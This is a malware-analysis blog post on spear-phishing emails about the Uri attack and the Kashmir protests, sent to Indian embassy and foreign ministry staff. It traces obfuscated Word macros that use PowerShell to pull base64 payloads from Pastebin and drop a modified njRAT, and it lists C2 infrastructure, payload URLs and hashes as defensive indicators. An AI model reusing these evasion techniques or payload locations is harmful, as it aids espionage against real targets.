# emails targeting Indian Embassies and Indian Ministry of external affairs **cysinfo.com/uri-terror-attack-spear-phishing-emails-targeting-indian-embassies-and-indian-mea/** 1/19/2017 [In my previous blog I posted details of a cyber attack targeting Indian government organizations. This blog post](https://cysinfo.com/malware-actors-using-nic-cyber-security-themed-spear-phishing-target-indian-government-organizations/) [describes another attack campaign where attackers used the Uri terror attack and Kashmir protest themed spear](https://en.wikipedia.org/wiki/2016_Uri_attack) phishing emails to target officials in the Indian Embassies and Indian Ministry of External Affairs (MEA). In order to infect the victims, the attackers distributed spear-phishing emails containing malicious word document which dropped a malware capable of spying on infected systems. The email purported to have been sent from legitimate email ids. The attackers spoofed the email ids associated with Indian Ministry of Home Affairs to send out email to the victims. Attackers also used the name of the top-ranking official associated with Minister of Home affairs in the signature of the email, this is to make it look like the email was sent by a high-ranking Government official associated with Ministry of Home Affairs (MHA). **Overview of the Malicious Emails** In the The first wave of attack, The attackers spoofed an email id that is associated with Indian Ministry of Home Affairs (MHA) and an email was sent on September 20th, 2016 (just 2 days after the Uri terror attack) to an email id associated with the Indian Embassy in Japan. The email was made to look like as if an investigation report related to Uri terror attack was shared by the MHA official. This email contained a malicious word document (Uri Terror _Report.doc) as shown in the below screen shot_ On Sept 20th,2016 similar Uri Terror report themed email was also sent to an email id connected with Indian embassy in Thailand. This email was later forwarded on Oct 24th,2016 from a spoofed email id which is associated with Thailand Indian embassy to various email recipients connected to the Indian Ministry of External Affairs as shown in the below screen shot. This email also contained the same malicious word document (Uri Terror _Report.doc)_ ----- In the second wave of attack slightly different theme was used, this time attackers used the Jammnu & Kashmir protest theme to target the victims. In this case Attackers again spoofed an email id associated with Indian Ministry of Home Affairs and the mail was sent on September 1,2016 to an email id associated Thailand Indian embassy, this email was later forwarded on Oct 24th,2016 from a spoofed email of Thailand Indian embassy to various email recipients connected to the Indian Ministry of External Affairs (MEA). This time the email was made to look like an investigation report related to Jammu & Kashmir protest was shared by the Ministry of Home Affairs Official and the forwarded email was made to look like the report was forwarded by an Ambassador in Thailand Indian embassy to the MEA officials. This email contained a different malicious word document (mha-report.doc) as shown in the below screen shot. From the emails (and the attachments) it looks like the goal of the attackers was to infect and take control of the systems and also to spy on the actions of the Indian Government post the Jammu & Kashmir protest and Uri Terror attack. ----- documents (Uri Terror Report.doc and mha-report.doc) displayed the same content and contained a Show Document button as shown below In case of both the documents (Uri Terror Report.doc and mha-report.doc) the malicious macro code was heavily obfuscated(used obscure variable/function names to make analysis harder) and did not contain any auto execute functions . Malicious activity is trigged only on user interaction, attackers normally use this technique to bypass sandbox/automated analysis. Reverse engineering both the word documents (Uri Terror Report.doc & mha_report.doc) exhibited similar behaviour except the minor difference mentioned below._ In case of _mha-report.doc the malicious activity triggered only when the show document button was clicked, when_ this event occurs the macro code calls a subroutine CommandButton1_Click() which in turn calls a malicious obfuscated function (Bulbaknopka()) as shown in the below screen shot. In case of _Uri Terror Report.doc the malicious activity triggered when the document was either closed or when the_ show document button was clicked, when any of these event occurs a malicious obfuscated function (chugnnarabashkoim()) gets called as shown below. ----- The malicious macro code first decodes a string which contains a reference to the pastebin url. The macro then decodes a PowerShell script which downloads base64 encoded content from the pastebin url. Below screen shot shows the network traffic generated as a result of macro code executing the PowerShell script. Below screen shot shows the malicious base64 encoded content hosted on that pastebin link. ----- The base64 encoded content downloaded from the Pastebin link is then decoded to an executable and dropped on the system. The technique of hosting malicious code in legitimate sites like Pastebin has advantages and it is highly unlikely to trigger any suspicion in security monitoring and also can bypass reputation based devices. Below screen shot shows the file (officeupdate.exe) decoded and dropped on the system. The dropped file was determined as modified version of njRAT trojan. The dropped file ( officeupdate.exe) is then executed by the macro code using the PowerShell script. njRAT is a Remote Access Tool (RAT) used mostly by the actor groups in the middle east. Once infected njRAT communicates to the attacker and allows the attacker to log keystrokes upload/download files access victims web ----- **Analysis of the Dropped Executable (officeupdate.exe)** The dropped file was analyzed in an isolated environment (without actually allowing it to connect to the c2 server). This section contains the behavioral analysis of the dropped executable Once the dropped file (officeupdate.exe) is executed the malware drops additional files ( _googleupdate.exe, malib.dll_ _and msccvs.dll) into the %AllUsersProfile%\Google directory and then executes the dropped googleupdate.exe_ The malware then communicates with the C2 server (khanji[.]ddns[.]net) on port 5555 ----- **C2 Communication Pattern** Upon execution malware makes a connection to the c2 server on port 5555 and sends the system & operating system information along with some base64 encoded strings to the attacker as shown below. Below is the description of the strings passed in the C2 communication **_WIN-T9UN4HIIHEC -> is the hostname of the infected system_** **_Administrator -> is the username_** **_16-12-04 -> is the infection date_** **_No -> Indicates that the system has no camera_** The below screen shot shows the base64 decoded strings associated with the C2 communication Below is the description of the decoded strings ----- **_Process Hacker [WIN-T9UN4HIIHEC\Administrator]+ -> Reports open window, In my case I was using a tool_** **_called Process Hacker, The information on the open window lets the attacker know what tools are running_** **_on the system or if analysis tools are used to inspect the malware._** **C2 Domain Information** This section contains the details of the C2 domain (khanji[.]ddns[.]net). Attackers used the DynamicDNS to host the C2 server, this allows the attacker to quickly change the IP address in real time if the malware C2 server infrastructure is unavailable. The C2 domain was associated with multiple IP addresses in past as shown below During the timeline of this cyber attack most of these IP addresses were located in Pakistan and few IP addresses used the hosting provider infrastructure as shown in the screen shot below ----- Below screenshot shows the timeline when these IP addresses were active. The C2 domain (khanji[.]ddns[.]net) was also found to be associated with multiple malware samples in the past, Some of these malware samples made connection to pastebin urls upon execution, which is similar to the behavior mentioned previously. ----- **Threat Intelligence** Based on the base64 encoded content posted in the Pastebin, userid associated with the Pastebin post was determined. The same user posted multiple similar posts most of them containing similar base64 encoded content (probably used by the malwares in other campaigns to decode and drop malware executable), these posts were made between July 21st, 2016 to September 30, 2016. Below screen shot shows the posts made by the user, the hits column in the below screen shot gives an idea of number of times the links were visited (probably by the malicious macro code), this can give rough idea of the number of users who are probably infected as a result of opening the malicious document. ----- Below screen shot shows one of the post containing base64 encoded data made by the user on Sept 26th,2016 Doing a Google search for the Pastebin userid landed me on a YouTube video posted by an individual demonstrating his modified version of njRAT control panel/builder kit. The Pastebin userid matched with the Email ID mentioned by this individual in the YouTube video description section as shown below. This individual also used a specific keyword in his Skype id, Twitter id, and the YouTube username. This same keyword was also found in the njRAT C2 communication used in this attack as shown below. ----- After inspecting the njRAT builder kit it was determined that this individual customized the existing njRAT builder kit to bypass security products. The product information in the builder kit matched with this individual’s YouTube username and the YouTube channel. The njRAT used in this cyber attack was built from this builder kit. Based on this information it can be concluded that espionage actors used this individual’s modified version of njRAT in this cyber attack. Even though this individual’s email id matched with the Pastebin id where base64 encoded malicious code was found, it is hard to say if this individual was or was not involved in this cyber attack. It could be possible that the espionage actors used his public identity as a diversion to mislead and to hide the real identity of the attackers or it is also possible that this individual was hired to carry out the attack. **Indicators Of Compromise** The indicators are provided below, these indicators can be used by the organizations (Government, Public and Private organizations) to detect and investigate this attack campaign. **_Dropped Malware Samples:_** _14b9d54f07f3facf1240c5ba89aa2410 (googleupdate.exe)_ _2b0bd7e43c1f98f9db804011a54c11d6 (malib.dll)_ _feec4b571756e8c015c884cb5441166b (msccvs.dll)_ _84d9d0524e14d9ab5f88bbce6d2d2582 (officeupdate.exe)_ ----- _139[.]190[.]6[.]180_ _39[.]40[.]141[.]25_ _175[.]110[.]165[.]110_ _39[.]40[.]44[.]245_ _39[.]40[.]67[.]219_ _119[.]160[.]68[.]178_ _175[.]107[.]13[.]215_ _39[.]47[.]125[.]110_ _175[.]107[.]5[.]247_ _175[.]107[.]6[.]174_ _182[.]191[.]90[.]91_ _175[.]107[.]7[.]50_ _182[.]191[.]90[.]92_ _175[.]107[.]7[.]69_ _39[.]47[.]84[.]127_ _192[.]169[.]136[.]121_ _155[.]254[.]225[.]24_ _203[.]31[.]216[.]214_ _45[.]42[.]243[.]20_ **_Pastebin URL’s Hosting Malicious Payload:_** _hxxp://pastebin.com/raw/5j4hc8gT_ _hxxp://pastebin.com/raw/6bwniBtB_ **_Related Malware Samples associated with C2 (khanji[.]ddns[.]net):_** _028caf3b1f5174ae092ecf435c1fccc2_ _7732d5349a0cfa1c3e4bcfa0c06949e4_ _9909f8558209449348a817f297429a48_ _63698ddbdff5be7d5a7ba7f31d0d592c_ _7c4e60685203b229a41ae65eba1a0e10_ _e2112439121f8ba9164668f54ca1c6af_ _784b6e13f195236304e1c172dcdab51f_ _b0f0350a5c2480d8419d14ec3445b765_ _9a51db9889d4fd6d02bdb35bd13fb07e_ _8199667bad5559ee8f04fd6b1a587a75_ _7ad6aaa107a7616a3dbe8e3babf5d310_ **Conclusion** Attackers in this case made every attempt to launch a clever attack campaign by spoofing legitimate email ids and using an email theme relevant to the targets. The following factors in this cyber attack suggests the possible involvement of Pakistan state sponsored cyber espionage group to mainly spy on India’s actions related to these Geo-political events (Uri terror attack and Jammu & Kashmir protests). _Victims/targets chosen (Indian Embassy and Indian MEA officals)_ _Use of Email theme related to the Geo-political events that is of interest to the targets_ _Timing of the spear phishing emails sent to the victims_ _Location of the C2 infrastructure_ ----- gain long-term access by evading anti-virus, sandbox and security monitoring at both the desktop and network levels. _Use of obfuscated malicious macro code_ _Use of macro code that triggers only on user intervention (to bypass sandbox analysis)_ _Use of legitimate site (Pastebin) to host malicious code (to bypass security monitoring)_ _Use of customized njRAT (capable of evading anti-virus)_ _Use of Dynamic DNS to host C2 infrastructure_ [I would like to thank Brian Rogalski who after reading my](https://twitter.com/br0g_RE) [previous blog post shared a malicious document which he](https://cysinfo.com/malware-actors-using-nic-cyber-security-themed-spear-phishing-target-indian-government-organizations/) [thought was similar to the document mentioned in my previous blog. This malicious document shared by Brian](https://cysinfo.com/malware-actors-using-nic-cyber-security-themed-spear-phishing-target-indian-government-organizations/) triggered this investigation and helped me in identifying the related Emails and related documents associated with this cyber attack. **References** https://www.zscaler.com/blogs/research/njrat-h-worm-variant-infections-continue-rise http://threatgeek.typepad.com/files/fta-1009—njrat-uncovered-1.pdf https://www.eff.org/files/2013/12/28/quantum_of_surveillance4d.pdf https://www.symantec.com/connect/blogs/simple-njrat-fuels-nascent-middle-east-cybercrime-scene [Follow us on Twitter: @monnappa22](https://twitter.com/monnappa22) [@cysinfo22](https://twitter.com/cysinfo22) -----